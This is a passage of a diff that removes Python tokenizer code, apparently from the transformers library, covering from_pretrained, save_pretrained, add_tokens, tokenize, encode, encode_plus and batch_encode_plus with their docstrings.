list(cls.vocab_files_names.values()), - ) - ) - - raise EnvironmentError(msg) - - if all( - full_file_name is None for full_file_name in resolved_vocab_files.values() - ): - raise EnvironmentError( - "Model name '{}' was not found in tokenizers model name list ({}). " - "We assumed '{}' was a path, a model identifier, or url to a directory containing vocabulary files " - "named {} but couldn't find such vocabulary files at this path or url.".format( - pretrained_model_name_or_path, - ", ".join(s3_models), - pretrained_model_name_or_path, - list(cls.vocab_files_names.values()), - ) - ) - - for file_id, file_path in vocab_files.items(): - if file_path == resolved_vocab_files[file_id]: - logger.info("loading file {}".format(file_path)) - else: - logger.info( - "loading file {} from cache at {}".format( - file_path, resolved_vocab_files[file_id] - ) - ) - - # Prepare tokenizer initialization kwargs - # Did we saved some inputs and kwargs to reload ? - tokenizer_config_file = resolved_vocab_files.pop("tokenizer_config_file", None) - if tokenizer_config_file is not None: - with open( - tokenizer_config_file, encoding="utf-8" - ) as tokenizer_config_handle: - init_kwargs = json.load(tokenizer_config_handle) - saved_init_inputs = init_kwargs.pop("init_inputs", ()) - if not init_inputs: - init_inputs = saved_init_inputs - else: - init_kwargs = init_configuration - - # Update with newly provided kwargs - init_kwargs.update(kwargs) - - # Set max length if needed - if pretrained_model_name_or_path in cls.max_model_input_sizes: - # if we're using a pretrained model, ensure the tokenizer - # wont index sequences longer than the number of positional embeddings - max_len = cls.max_model_input_sizes[pretrained_model_name_or_path] - if max_len is not None and isinstance(max_len, (int, float)): - init_kwargs["max_len"] = min( - init_kwargs.get("max_len", int(1e12)), max_len - ) - - # Merge resolved_vocab_files arguments in init_kwargs. - added_tokens_file = resolved_vocab_files.pop("added_tokens_file", None) - special_tokens_map_file = resolved_vocab_files.pop( - "special_tokens_map_file", None - ) - for args_name, file_path in resolved_vocab_files.items(): - if args_name not in init_kwargs: - init_kwargs[args_name] = file_path - if special_tokens_map_file is not None: - with open( - special_tokens_map_file, encoding="utf-8" - ) as special_tokens_map_handle: - special_tokens_map = json.load(special_tokens_map_handle) - for key, value in special_tokens_map.items(): - if key not in init_kwargs: - init_kwargs[key] = value - - # Instantiate tokenizer. - try: - tokenizer = cls(*init_inputs, **init_kwargs) - except OSError: - raise OSError( - "Unable to load vocabulary from file. " - "Please check that the provided vocabulary is accessible and not corrupted." - ) - - # Save inputs and kwargs for saving and re-loading with ``save_pretrained`` - tokenizer.init_inputs = init_inputs - tokenizer.init_kwargs = init_kwargs - - # update unique_added_tokens_encoder with special tokens for correct tokenization - tokenizer.unique_added_tokens_encoder.update(set(tokenizer.all_special_tokens)) - - # Add supplementary tokens. - if added_tokens_file is not None: - with open(added_tokens_file, encoding="utf-8") as added_tokens_handle: - added_tok_encoder = json.load(added_tokens_handle) - added_tok_decoder = {v: k for k, v in added_tok_encoder.items()} - tokenizer.added_tokens_encoder.update(added_tok_encoder) - tokenizer.added_tokens_decoder.update(added_tok_decoder) - tokenizer.unique_added_tokens_encoder.update( - set(tokenizer.added_tokens_encoder.keys()) - ) - - return tokenizer - - def save_pretrained(self, save_directory): - """Save the tokenizer vocabulary files together with: - - added tokens, - - special-tokens-to-class-attributes-mapping, - - tokenizer instantiation positional and keywords inputs (e.g. do_lower_case for Bert). - - This won't save modifications other than (added tokens and special token mapping) you may have - applied to the tokenizer after the instantiation (e.g. modifying tokenizer.do_lower_case after creation). - - This method make sure the full tokenizer can then be re-loaded using the :func:`~transformers.PreTrainedTokenizer.from_pretrained` class method. - """ - if not os.path.isdir(save_directory): - logger.error( - "Saving directory ({}) should be a directory".format(save_directory) - ) - return - - special_tokens_map_file = os.path.join(save_directory, SPECIAL_TOKENS_MAP_FILE) - added_tokens_file = os.path.join(save_directory, ADDED_TOKENS_FILE) - tokenizer_config_file = os.path.join(save_directory, TOKENIZER_CONFIG_FILE) - - tokenizer_config = copy.deepcopy(self.init_kwargs) - if len(self.init_inputs) > 0: - tokenizer_config["init_inputs"] = copy.deepcopy(self.init_inputs) - for file_id in self.vocab_files_names.keys(): - tokenizer_config.pop(file_id, None) - - with open(tokenizer_config_file, "w", encoding="utf-8") as f: - f.write(json.dumps(tokenizer_config, ensure_ascii=False)) - - with open(special_tokens_map_file, "w", encoding="utf-8") as f: - f.write(json.dumps(self.special_tokens_map, ensure_ascii=False)) - - if len(self.added_tokens_encoder) > 0: - with open(added_tokens_file, "w", encoding="utf-8") as f: - out_str = json.dumps(self.added_tokens_encoder, ensure_ascii=False) - f.write(out_str) - - vocab_files = self.save_vocabulary(save_directory) - - return vocab_files + (special_tokens_map_file, added_tokens_file) - - def save_vocabulary(self, save_directory): - """Save the tokenizer vocabulary to a directory. This method does *NOT* save added tokens - and special token mappings. - - Please use :func:`~transformers.PreTrainedTokenizer.save_pretrained` `()` to save the full Tokenizer state if you want to reload it using the :func:`~transformers.PreTrainedTokenizer.from_pretrained` class method. - """ - raise NotImplementedError - - def vocab_size(self): - """Size of the base vocabulary (without the added tokens)""" - raise NotImplementedError - - def __len__(self): - """Size of the full vocabulary with the added tokens""" - return self.vocab_size + len(self.added_tokens_encoder) - - def add_tokens(self, new_tokens): - """ - Add a list of new tokens to the tokenizer class. If the new tokens are not in the - vocabulary, they are added to it with indices starting from length of the current vocabulary. - - Args: - new_tokens: string or list of string. Each string is a token to add. Tokens are only added if they are not already in the vocabulary (tested by checking if the tokenizer assign the index of the ``unk_token`` to them). - - Returns: - Number of tokens added to the vocabulary. - - Examples:: - - # Let's see how to increase the vocabulary of Bert model and tokenizer - tokenizer = BertTokenizer.from_pretrained('bert-base-uncased') - model = BertModel.from_pretrained('bert-base-uncased') - - num_added_toks = tokenizer.add_tokens(['new_tok1', 'my_new-tok2']) - print('We have added', num_added_toks, 'tokens') - model.resize_token_embeddings(len(tokenizer)) # Notice: resize_token_embeddings expect to receive the full size of the new vocabulary, i.e. the length of the tokenizer. - """ - if not new_tokens: - return 0 - - if not isinstance(new_tokens, list): - new_tokens = [new_tokens] - - to_add_tokens = [] - for token in new_tokens: - assert isinstance(token, str) - if ( - self.init_kwargs.get("do_lower_case", False) - and token not in self.all_special_tokens - ): - token = token.lower() - if ( - token != self.unk_token - and self.convert_tokens_to_ids(token) - == self.convert_tokens_to_ids(self.unk_token) - and token not in to_add_tokens - ): - to_add_tokens.append(token) - logger.info("Adding %s to the vocabulary", token) - - added_tok_encoder = dict( - (tok, len(self) + i) for i, tok in enumerate(to_add_tokens) - ) - added_tok_decoder = {v: k for k, v in added_tok_encoder.items()} - self.added_tokens_encoder.update(added_tok_encoder) - self.unique_added_tokens_encoder = set(self.added_tokens_encoder.keys()).union( - set(self.all_special_tokens) - ) - self.added_tokens_decoder.update(added_tok_decoder) - - return len(to_add_tokens) - - def num_added_tokens(self, pair=False): - """ - Returns the number of added tokens when encoding a sequence with special tokens. - - Note: - This encodes inputs and checks the number of added tokens, and is therefore not efficient. Do not put this - inside your training loop. - - Args: - pair: Returns the number of added tokens in the case of a sequence pair if set to True, returns the - number of added tokens in the case of a single sequence if set to False. - - Returns: - Number of tokens added to sequences - """ - token_ids_0 = [] - token_ids_1 = [] - return len( - self.build_inputs_with_special_tokens( - token_ids_0, token_ids_1 if pair else None - ) - ) - - def add_special_tokens(self, special_tokens_dict): - """ - Add a dictionary of special tokens (eos, pad, cls...) to the encoder and link them - to class attributes. If special tokens are NOT in the vocabulary, they are added - to it (indexed starting from the last index of the current vocabulary). - - Using `add_special_tokens` will ensure your special tokens can be used in several ways: - - - special tokens are carefully handled by the tokenizer (they are never split) - - you can easily refer to special tokens using tokenizer class attributes like `tokenizer.cls_token`. This makes it easy to develop model-agnostic training and fine-tuning scripts. - - When possible, special tokens are already registered for provided pretrained models (ex: BertTokenizer cls_token is already registered to be '[CLS]' and XLM's one is also registered to be '') - - Args: - special_tokens_dict: dict of string. Keys should be in the list of predefined special attributes: - [``bos_token``, ``eos_token``, ``unk_token``, ``sep_token``, ``pad_token``, ``cls_token``, ``mask_token``, - ``additional_special_tokens``]. - - Tokens are only added if they are not already in the vocabulary (tested by checking if the tokenizer assign the index of the ``unk_token`` to them). - - Returns: - Number of tokens added to the vocabulary. - - Examples:: - - # Let's see how to add a new classification token to GPT-2 - tokenizer = GPT2Tokenizer.from_pretrained('gpt2') - model = GPT2Model.from_pretrained('gpt2') - - special_tokens_dict = {'cls_token': ''} - - num_added_toks = tokenizer.add_special_tokens(special_tokens_dict) - print('We have added', num_added_toks, 'tokens') - model.resize_token_embeddings(len(tokenizer)) # Notice: resize_token_embeddings expect to receive the full size of the new vocabulary, i.e. the length of the tokenizer. - - assert tokenizer.cls_token == '' - """ - if not special_tokens_dict: - return 0 - - added_tokens = 0 - for key, value in special_tokens_dict.items(): - assert key in self.SPECIAL_TOKENS_ATTRIBUTES - if key == "additional_special_tokens": - assert isinstance(value, (list, tuple)) and all( - isinstance(t, str) for t in value - ) - added_tokens += self.add_tokens(value) - else: - assert isinstance(value, str) - added_tokens += self.add_tokens([value]) - logger.info("Assigning %s to the %s key of the tokenizer", value, key) - setattr(self, key, value) - - return added_tokens - - def tokenize(self, text, **kwargs): - """Converts a string in a sequence of tokens (string), using the tokenizer. - Split in words for word-based vocabulary or sub-words for sub-word-based - vocabularies (BPE/SentencePieces/WordPieces). - - Take care of added tokens. - - text: The sequence to be encoded. - add_prefix_space: Only applies to GPT-2 and RoBERTa tokenizers. When `True`, this ensures that the sequence - begins with an empty space. False by default except for when using RoBERTa with `add_special_tokens=True`. - **kwargs: passed to the `prepare_for_tokenization` preprocessing method. - """ - all_special_tokens = self.all_special_tokens - text = self.prepare_for_tokenization(text, **kwargs) - - def lowercase_text(t): - # convert non-special tokens to lowercase - escaped_special_toks = [re.escape(s_tok) for s_tok in all_special_tokens] - pattern = r"(" + r"|".join(escaped_special_toks) + r")|" + r"(.+?)" - return re.sub(pattern, lambda m: m.groups()[0] or m.groups()[1].lower(), t) - - if self.init_kwargs.get("do_lower_case", False): - text = lowercase_text(text) - - def split_on_token(tok, text): - result = [] - split_text = text.split(tok) - for i, sub_text in enumerate(split_text): - sub_text = sub_text.rstrip() - if i == 0 and not sub_text: - result += [tok] - elif i == len(split_text) - 1: - if sub_text: - result += [sub_text] - else: - pass - else: - if sub_text: - result += [sub_text] - result += [tok] - return result - - def split_on_tokens(tok_list, text): - if not text.strip(): - return [] - if not tok_list: - return self._tokenize(text) - - tokenized_text = [] - text_list = [text] - for tok in tok_list: - tokenized_text = [] - for sub_text in text_list: - if sub_text not in self.unique_added_tokens_encoder: - tokenized_text += split_on_token(tok, sub_text) - else: - tokenized_text += [sub_text] - text_list = tokenized_text - - return list( - itertools.chain.from_iterable( - ( - self._tokenize(token) - if token not in self.unique_added_tokens_encoder - else [token] - for token in tokenized_text - ) - ) - ) - - added_tokens = self.unique_added_tokens_encoder - tokenized_text = split_on_tokens(added_tokens, text) - return tokenized_text - - def _tokenize(self, text, **kwargs): - """Converts a string in a sequence of tokens (string), using the tokenizer. - Split in words for word-based vocabulary or sub-words for sub-word-based - vocabularies (BPE/SentencePieces/WordPieces). - - Do NOT take care of added tokens. - """ - raise NotImplementedError - - def convert_tokens_to_ids(self, tokens): - """Converts a single token, or a sequence of tokens, (str) in a single integer id - (resp. a sequence of ids), using the vocabulary. - """ - if tokens is None: - return None - - if isinstance(tokens, str): - return self._convert_token_to_id_with_added_voc(tokens) - - ids = [] - for token in tokens: - ids.append(self._convert_token_to_id_with_added_voc(token)) - return ids - - def _convert_token_to_id_with_added_voc(self, token): - if token is None: - return None - - if token in self.added_tokens_encoder: - return self.added_tokens_encoder[token] - return self._convert_token_to_id(token) - - def _convert_token_to_id(self, token): - raise NotImplementedError - - def encode( - self, - text: str, - text_pair: Optional[str] = None, - add_special_tokens: bool = True, - max_length: Optional[int] = None, - stride: int = 0, - truncation_strategy: str = "longest_first", - pad_to_max_length: bool = False, - return_tensors: Optional[str] = None, - **kwargs - ): - """ - Converts a string in a sequence of ids (integer), using the tokenizer and vocabulary. - - Same as doing ``self.convert_tokens_to_ids(self.tokenize(text))``. - - Args: - text (:obj:`str` or :obj:`List[str]`): - The first sequence to be encoded. This can be a string, a list of strings (tokenized string using - the `tokenize` method) or a list of integers (tokenized string ids using the `convert_tokens_to_ids` - method) - text_pair (:obj:`str` or :obj:`List[str]`, `optional`, defaults to :obj:`None`): - Optional second sequence to be encoded. This can be a string, a list of strings (tokenized - string using the `tokenize` method) or a list of integers (tokenized string ids using the - `convert_tokens_to_ids` method) - add_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`True`): - If set to ``True``, the sequences will be encoded with the special tokens relative - to their model. - max_length (:obj:`int`, `optional`, defaults to :obj:`None`): - If set to a number, will limit the total sequence returned so that it has a maximum length. - If there are overflowing tokens, those will be added to the returned dictionary - stride (:obj:`int`, `optional`, defaults to ``0``): - If set to a number along with max_length, the overflowing tokens returned will contain some tokens - from the main sequence returned. The value of this argument defines the number of additional tokens. - truncation_strategy (:obj:`str`, `optional`, defaults to `longest_first`): - String selected in the following options: - - - 'longest_first' (default) Iteratively reduce the inputs sequence until the input is under max_length - starting from the longest one at each token (when there is a pair of input sequences) - - 'only_first': Only truncate the first sequence - - 'only_second': Only truncate the second sequence - - 'do_not_truncate': Does not truncate (raise an error if the input sequence is longer than max_length) - pad_to_max_length (:obj:`bool`, `optional`, defaults to :obj:`False`): - If set to True, the returned sequences will be padded according to the model's padding side and - padding index, up to their max length. If no max length is specified, the padding is done up to the - model's max length. The tokenizer padding sides are handled by the class attribute `padding_side` - which can be set to the following strings: - - - 'left': pads on the left of the sequences - - 'right': pads on the right of the sequences - Defaults to False: no padding. - return_tensors (:obj:`str`, `optional`, defaults to :obj:`None`): - Can be set to 'tf' or 'pt' to return respectively TensorFlow :obj:`tf.constant` - or PyTorch :obj:`torch.Tensor` instead of a list of python integers. - **kwargs: passed to the `self.tokenize()` method - """ - encoded_inputs = self.encode_plus( - text, - text_pair=text_pair, - max_length=max_length, - add_special_tokens=add_special_tokens, - stride=stride, - truncation_strategy=truncation_strategy, - pad_to_max_length=pad_to_max_length, - return_tensors=return_tensors, - **kwargs, - ) - - return encoded_inputs["input_ids"] - - def encode_plus( - self, - text: str, - text_pair: Optional[str] = None, - add_special_tokens: bool = True, - max_length: Optional[int] = None, - stride: int = 0, - truncation_strategy: str = "longest_first", - pad_to_max_length: bool = False, - return_tensors: Optional[str] = None, - return_token_type_ids: Optional[bool] = None, - return_attention_mask: Optional[bool] = None, - return_overflowing_tokens: bool = False, - return_special_tokens_mask: bool = False, - return_offsets_mapping: bool = False, - **kwargs - ): - """ - Returns a dictionary containing the encoded sequence or sequence pair and additional information: - the mask for sequence classification and the overflowing elements if a ``max_length`` is specified. - - Args: - text (:obj:`str` or :obj:`List[str]`): - The first sequence to be encoded. This can be a string, a list of strings (tokenized string using - the `tokenize` method) or a list of integers (tokenized string ids using the `convert_tokens_to_ids` - method) - text_pair (:obj:`str` or :obj:`List[str]`, `optional`, defaults to :obj:`None`): - Optional second sequence to be encoded. This can be a string, a list of strings (tokenized - string using the `tokenize` method) or a list of integers (tokenized string ids using the - `convert_tokens_to_ids` method) - add_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`True`): - If set to ``True``, the sequences will be encoded with the special tokens relative - to their model. - max_length (:obj:`int`, `optional`, defaults to :obj:`None`): - If set to a number, will limit the total sequence returned so that it has a maximum length. - If there are overflowing tokens, those will be added to the returned dictionary - stride (:obj:`int`, `optional`, defaults to ``0``): - If set to a number along with max_length, the overflowing tokens returned will contain some tokens - from the main sequence returned. The value of this argument defines the number of additional tokens. - truncation_strategy (:obj:`str`, `optional`, defaults to `longest_first`): - String selected in the following options: - - - 'longest_first' (default) Iteratively reduce the inputs sequence until the input is under max_length - starting from the longest one at each token (when there is a pair of input sequences) - - 'only_first': Only truncate the first sequence - - 'only_second': Only truncate the second sequence - - 'do_not_truncate': Does not truncate (raise an error if the input sequence is longer than max_length) - pad_to_max_length (:obj:`bool`, `optional`, defaults to :obj:`False`): - If set to True, the returned sequences will be padded according to the model's padding side and - padding index, up to their max length. If no max length is specified, the padding is done up to the - model's max length. The tokenizer padding sides are handled by the class attribute `padding_side` - which can be set to the following strings: - - - 'left': pads on the left of the sequences - - 'right': pads on the right of the sequences - Defaults to False: no padding. - return_tensors (:obj:`str`, `optional`, defaults to :obj:`None`): - Can be set to 'tf' or 'pt' to return respectively TensorFlow :obj:`tf.constant` - or PyTorch :obj:`torch.Tensor` instead of a list of python integers. - return_token_type_ids (:obj:`bool`, `optional`, defaults to :obj:`None`): - Whether to return token type IDs. If left to the default, will return the token type IDs according - to the specific tokenizer's default, defined by the :obj:`return_outputs` attribute. - - `What are token type IDs? <../glossary.html#token-type-ids>`_ - return_attention_mask (:obj:`bool`, `optional`, defaults to :obj:`none`): - Whether to return the attention mask. If left to the default, will return the attention mask according - to the specific tokenizer's default, defined by the :obj:`return_outputs` attribute. - - `What are attention masks? <../glossary.html#attention-mask>`__ - return_overflowing_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`): - Set to True to return overflowing token information (default False). - return_special_tokens_mask (:obj:`bool`, `optional`, defaults to :obj:`False`): - Set to True to return special tokens mask information (default False). - return_offsets_mapping (:obj:`bool`, `optional`, defaults to :obj:`False`): - Set to True to return (char_start, char_end) for each token (default False). - If using Python's tokenizer, this method will raise NotImplementedError. This one is only available on - Rust-based tokenizers inheriting from PreTrainedTokenizerFast. - **kwargs: passed to the `self.tokenize()` method - - Return: - A Dictionary of shape:: - - { - input_ids: list[int], - token_type_ids: list[int] if return_token_type_ids is True (default) - attention_mask: list[int] if return_attention_mask is True (default) - overflowing_tokens: list[int] if a ``max_length`` is specified and return_overflowing_tokens is True - num_truncated_tokens: int if a ``max_length`` is specified and return_overflowing_tokens is True - special_tokens_mask: list[int] if ``add_special_tokens`` if set to ``True`` and return_special_tokens_mask is True - } - - With the fields: - - - ``input_ids``: list of token ids to be fed to a model - - ``token_type_ids``: list of token type ids to be fed to a model - - ``attention_mask``: list of indices specifying which tokens should be attended to by the model - - ``overflowing_tokens``: list of overflowing tokens if a max length is specified. - - ``num_truncated_tokens``: number of overflowing tokens a ``max_length`` is specified - - ``special_tokens_mask``: if adding special tokens, this is a list of [0, 1], with 0 specifying special added - tokens and 1 specifying sequence tokens. - """ - - def get_input_ids(text): - if isinstance(text, str): - tokens = self.tokenize( - text, add_special_tokens=add_special_tokens, **kwargs - ) - return self.convert_tokens_to_ids(tokens) - elif ( - isinstance(text, (list, tuple)) - and len(text) > 0 - and isinstance(text[0], str) - ): - return self.convert_tokens_to_ids(text) - elif ( - isinstance(text, (list, tuple)) - and len(text) > 0 - and isinstance(text[0], int) - ): - return text - else: - raise ValueError( - "Input is not valid. Should be a string, a list/tuple of strings or a list/tuple of integers." - ) - - if return_offsets_mapping: - raise NotImplementedError( - "return_offset_mapping is not available when using Python tokenizers." - "To use this feature, change your tokenizer to one deriving from " - "transformers.PreTrainedTokenizerFast." - "More information on available tokenizers at " - "https://github.com/huggingface/transformers/pull/2674" - ) - - # Throw an error if we can pad because there is no padding token - if pad_to_max_length and self.pad_token_id is None: - raise ValueError( - "Unable to set proper padding strategy as the tokenizer does not have a padding token. In this case please set the `pad_token` `(tokenizer.pad_token = tokenizer.eos_token e.g.)` or add a new pad token via the function add_special_tokens if you want to use a padding strategy" - ) - - first_ids = get_input_ids(text) - second_ids = get_input_ids(text_pair) if text_pair is not None else None - - return self.prepare_for_model( - first_ids, - pair_ids=second_ids, - max_length=max_length, - pad_to_max_length=pad_to_max_length, - add_special_tokens=add_special_tokens, - stride=stride, - truncation_strategy=truncation_strategy, - return_tensors=return_tensors, - return_attention_mask=return_attention_mask, - return_token_type_ids=return_token_type_ids, - return_overflowing_tokens=return_overflowing_tokens, - return_special_tokens_mask=return_special_tokens_mask, - ) - - def batch_encode_plus( - self, - batch_text_or_text_pairs: Union[str, List[str]], - add_special_tokens: bool = True, - max_length: Optional[int] = None, - stride: int = 0, - truncation_strategy: str = "longest_first", - pad_to_max_length: bool = False, - return_tensors: Optional[str] = None, - return_token_type_ids: Optional[bool] = None, - return_attention_masks: Optional[bool] = None, - return_overflowing_tokens: bool = False, - return_special_tokens_masks: bool = False, - return_offsets_mapping: bool = False, - return_input_lengths: bool = False, - **kwargs - ): - """ - Returns a dictionary containing the encoded sequence or sequence pair and additional information: - the mask for sequence classification and the overflowing elements if a ``max_length`` is specified. - - Args: - batch_text_or_text_pairs (:obj:`List[str]` or :obj:`List[List[str]]`): - Batch of sequences or pair of sequences to be encoded. - This can be a list of string/string-sequences/int-sequences or a list of pair of - string/string-sequences/int-sequence (see details in encode_plus) - add_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`True`): - If set to ``True``, the sequences will be encoded with the special tokens relative - to their model. - max_length (:obj:`int`, `optional`, defaults to :obj:`None`): - If set to a number, will limit the total sequence returned so that it has a maximum length. - If there are overflowing tokens, those will be added to the returned dictionary - stride (:obj:`int`, `optional`, defaults to ``0``): - If set to a number along with max_length, the overflowing tokens returned will contain some tokens - from the main sequence returned. The value of this argument defines the number of additional tokens. - truncation_strategy (:obj:`str`, `optional`, defaults to `longest_first`): - String selected in the following options: - - - 'longest_first' (default) Iteratively reduce the inputs sequence until the input is under max_length - starting from the longest one at each token (when there is a pair of input sequences) - - 'only_first': Only truncate the first sequence - - 'only_second': Only truncate the second sequence - - 'do_not_truncate': Does not truncate (raise an error if the input sequence is longer than max_length) - pad_to_max_length (:obj:`bool`, `optional`, defaults to :obj:`False`): - If set to True, the returned sequences will be padded according to the model's padding side and - padding index, up to their max length. If no max length is specified, the padding is done up to the - model's max length. The tokenizer padding sides are handled by the class attribute `padding_side` - which can be set to the following strings: - - - 'left': pads on the left of the sequences - - 'right': pads on the right of the sequences - Defaults to False: no padding. - return_tensors (:obj:`str`, `optional`, defaults to :obj:`None`): - Can be set to 'tf' or 'pt' to return respectively TensorFlow :obj:`tf.constant` - or PyTorch :obj:`torch.Tensor` instead of a list of python integers. - return_token_type_ids (:obj:`bool`, `optional`, defaults to :obj:`None`): - Whether to return token type IDs. If left to the default, will return the token type IDs according - to the specific tokenizer's default, defined by the :obj:`return_outputs` attribute. - - `What are token type IDs? <../glossary.html#token-type-ids>`_ - return_attention_masks (:obj:`bool`, `optional`, defaults to :obj:`none`): - Whether to return the attention mask. If left to the default, will return the attention mask according - to the specific tokenizer's default, defined by the :obj:`return_outputs` attribute. - - `What are attention masks? <../glossary.html#attention-mask>`__ - return_overflowing_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`): - Set to True to return overflowing token information (default False). - return_special_tokens_masks (:obj:`bool`, `optional`, defaults to :obj:`False`): - Set to True to return special tokens mask information (default False). - return_offsets_mapping (:obj:`bool`, `optional`, defaults to :obj:`False`): - Set to True to return (char_start, char_end) for each token (default False). - If using Python's tokenizer, this method will raise NotImplementedError. This one is only available on - Rust-based tokenizers inheriting from PreTrainedTokenizerFast. - return_input_lengths (:obj:`bool`, `optional`, defaults to :obj:`False`): - If set the resulting dictionary will include the length of each sample - **kwargs: passed to the `self.tokenize()` method - - Return: - A Dictionary of shape:: - - { - input_ids: list[List[int]], - token_type_ids: list[List[int]] if return_token_type_ids is True (default) - attention_mask: list[List[int]] if return_attention_mask is True (default) - overflowing_tokens: list[List[int]] if a ``max_length`` is specified and return_overflowing_tokens is True - num_truncated_tokens: List[int] if a ``max_length`` is specified and return_overflowing_tokens is True - special_tokens_mask: list[List[int]] if ``add_special_tokens`` if set to ``True`` and return_special_tokens_mask is True - } - - With the fields: - - - ``input_ids``: list of token ids to be fed to a model - - ``token_type_ids``: list of token type ids to be fed to a model - - ``attention_mask``: list of indices specifying which tokens should be attended to by the model - - ``overflowing_tokens``: list of overflowing tokens if a max length is specified. - - ``num_truncated_tokens``: number of overflowing tokens a ``max_length`` is specified - - ``special_tokens_mask``: if adding special tokens, this is a list of [0, 1], with 0 specifying special added - tokens and 1 specifying sequence tokens. - """ - - def get_input_ids(text): - if isinstance(text, str): - tokens = self.tokenize( - text, add_special_tokens=add_special_tokens, **kwargs - ) - return self.convert_tokens_to_ids(tokens) - elif ( - isinstance(text, (list, tuple)) - and len(text) > 0 - and isinstance(text[0], str) - ): - return self.convert_tokens_to_ids(text) - elif ( - isinstance(text, (list, tuple)) - and len(text) > 0 - and isinstance(text[0], int) - ): - return text - else: - raise ValueError( - "Input is not valid. Should be a string, a list/tuple of strings or a list/tuple of integers." - ) - - # Throw an error if we can pad because there is no padding token - if pad_to_max_length and self.pad_token_id is None: - raise ValueError( - "Unable to set proper padding strategy as the tokenizer does not have a padding token. In this case please set the `pad_token` `(tokenizer.pad_token = tokenizer.eos_token e.g.)` or add a new pad token via the function add_special_tokens if you want to use a padding strategy" - ) - - if return_offsets_mapping: - raise NotImplementedError( - "return_offset_mapping is not available when using Python tokenizers." - "To use this feature, change your tokenizer to one deriving from " - "transformers.PreTrainedTokenizerFast." - "More information on available tokenizers at " - "https://github.com/huggingface/transformers/pull/2674" - ) - - input_ids = [] - for ids_or_pair_ids in batch_text_or_text_pairs: - if isinstance(ids_or_pair_ids, (list, tuple)) and len(ids_or_pair_ids) == 2: - ids, pair_ids = ids_or_pair_ids - else: - ids, pair_ids = ids_or_pair_ids, None - - first_ids = get_input_ids(ids) - second_ids = get_input_ids(pair_ids) if pair_ids is not None else None - input_ids.append((first_ids, second_ids)) - - if max_length is None and pad_to_max_length: - - def total_sequence_length(input_pairs): - first_ids, second_ids = input_pairs - return len(first_ids) + ( - self.num_added_tokens() - if second_ids is None - else (len(second_ids) + self.num_added_tokens(pair=True)) - ) - - max_length = max([total_sequence_length(ids) for ids in input_ids]) - - batch_outputs = {} - for first_ids, second_ids in input_ids: - # Prepares a sequence of input id, or a pair of sequences of inputs ids so that it can be used by - # the model. It adds special tokens, truncates sequences if overflowing while taking into account - # the special tokens and manages a window stride for overflowing tokens - outputs = self.prepare_for_model( - first_ids, - pair_ids=second_ids, - max_length=max_length, - pad_to_max_length=pad_to_max_length, - add_special_tokens=add_special_tokens, - stride=stride, - truncation_strategy=truncation_strategy, - return_attention_mask=return_attention_masks, - return_token_type_ids=return_token_type_ids, - return_overflowing_tokens=return_overflowing_tokens, - return_special_tokens_mask=return_special_tokens_masks, - ) - - # Append the non-padded length to the output - if return_input_lengths: - outputs["input_len"] = len(outputs["input_ids"]) - - for key, value in outputs.items(): - if key not in batch_outputs: - batch_outputs[key] = [] - batch_outputs[key].append(value) - - if return_tensors is not None: - - # Do the tensor conversion in batch - for key, value in batch_outputs.items(): - if return_tensors == "tf" and is_tf_available(): - try: - batch_outputs[key] = tf.constant(value) - except ValueError: - if None in [item for sequence in value for item in sequence]: - raise ValueError(self.NO_PAD_TOKEN_FOR_BATCH_MSG) - else: - raise ValueError(self.UNEVEN_SEQUENCES_FOR_BATCH_MSG) - elif return_tensors == "pt" and is_torch_available(): - try: - batch_outputs[key] = torch.tensor(value) - except ValueError: - raise ValueError(self.UNEVEN_SEQUENCES_FOR_BATCH_MSG) - except RuntimeError: - if None in [item for sequence in value for item in sequence]: - raise ValueError(self.NO_PAD_TOKEN_FOR_BATCH_MSG) - else: - raise - elif return_tensors is not None: - logger.warning( - "Unable to convert output to tensors format {}, PyTorch or TensorFlow is not available.".format( - return_tensors - ) - ) - - return batch_outputs - - def prepare_for_model( - self, - ids: List[int], - pair_ids: Optional[List[int]] = None, - max_length: Optional[int] = None, - add_special_tokens: bool = True, - stride: int = 0, - truncation_strategy: str = "longest_first", - pad_to_max_length: bool = False, - return_tensors: Optional[str] = None, - return_token_type_ids: Optional[bool] = None, - return_attention_mask: Optional[bool] = None, - return_overflowing_tokens: bool = False, - return_special_tokens_mask: bool = False, - ): - """ - Prepares a sequence of input id, or a pair of sequences of inputs ids so that it can be used by the model. - It adds special tokens, truncates - sequences if overflowing while taking into account the special tokens and manages a window stride for - overflowing tokens - - Args: - ids: list of tokenized input ids. Can be obtained from a string by chaining the - `tokenize` and `convert_tokens_to_ids` methods. - pair_ids: Optional second list of input ids. Can be obtained from a string by chaining the - `tokenize` and `convert_tokens_to_ids` methods. - max_length: maximum length of the returned list. Will truncate by taking into account the special tokens. - add_special_tokens: if set to ``True``, the sequences will be encoded with the special tokens relative - to their model. - stride: window stride for overflowing tokens. Can be useful for edge effect removal when using sequential - list of inputs. - truncation_strategy: string selected in the following options: - - 'longest_first' (default) Iteratively reduce the inputs sequence until the input is under max_length - starting from the longest one at each token (when there is a pair of input sequences) - - 'only_first': Only truncate the first sequence - - 'only_second': Only truncate the second sequence - - 'do_not_truncate': Does not truncate (raise an error if the input sequence is longer than max_length) - pad_to_max_length: if set to True, the returned sequences will be padded according to the model's padding side and - padding index, up to their max length. If no max length is specified, the padding is done up to the model's max length. - The tokenizer padding sides are handled by the following strings: - - 'left': pads on the left of the sequences - - 'right': pads on the right of the sequences - Defaults to False: no padding. - return_tensors: (optional) can be set to 'tf' or 'pt' to return respectively TensorFlow tf.constant - or PyTorch torch.Tensor instead of a list of python integers. - return_token_type_ids: (optional) Set to False to avoid returning token_type_ids (default True). - return_attention_mask: (optional) Set to False to avoid returning attention mask (default True) - return_overflowing_tokens: (optional) Set to True to return overflowing token information (default False). - return_special_tokens_mask: (optional) Set to True to return special tokens mask information (default False). - - Return: - A Dictionary of shape:: - - { - input_ids: list[int], - token_type_ids: list[int] if return_token_type_ids is True (default) - overflowing_tokens: list[int] if a ``max_length`` is specified and return_overflowing_tokens is True - num_truncated_tokens: int if a ``max_length`` is specified and return_overflowing_tokens is True - special_tokens_mask: list[int] if ``add_special_tokens`` if set to ``True`` and return_special_tokens_mask is True - } - - With the fields: - ``input_ids``: list of token ids to be fed to a model - ``token_type_ids``: list of token type ids to be fed to a model - - ``overflowing_tokens``: list of overflowing tokens if a max length is specified. - ``num_truncated_tokens``: number of overflowing tokens a ``max_length`` is specified - 